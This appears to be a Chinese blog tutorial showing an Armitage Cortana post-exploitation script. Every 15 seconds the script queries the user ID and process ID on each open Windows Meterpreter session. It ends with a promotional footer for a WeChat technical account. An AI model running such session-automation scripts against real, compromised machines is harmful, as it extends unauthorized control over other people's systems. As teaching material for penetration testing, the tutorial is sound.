# Armitage使用Cortana实现后渗透攻击
首先,我们创建一个后渗透脚本heartbeat.cna
内容如下:
on heartbeat_15s{
local('$sid');
foreach $sid (session_ids()){
if(-iswinmeterpreter $sid && -isready $sid){
m_cmd($sid, "getuid");
m_cmd($sid, "getpid");
on meterpreter_getuid{
println(" $3 ");
}
on meterpreter_getpid{
println(" $3 ");
}
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
这个脚本中,我们使用了一个名为heartbeat_15s的函数。这个函数每隔15秒会重复执行一次。
函数local表示$sid是当前函数的一个局部变量。吓一跳foreach语句是一个队所有开放会话的循环遍历。以if开始的语句将会对每一个会话进行检查,检查内容为该会话类型是否为Windows Meterpreter控制,以及该会话是否可以进行交互并接受命令。
m_cmd函数使用$sid(会话ID)等参数和命令将命令发送给Meterpreter会话。接着,我们定义了一个meterpreter_形式的函数,意味着即将发送到Meterpreter会话的命令。这个函数将会打印sent命令的输出。
使用Cortana载入这个脚本,并对结果进行分析,如下图所示:
成功载入并执行这段脚本之后,每隔15秒就会显示目标系统的用户ID和当前使用进程的ID。
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!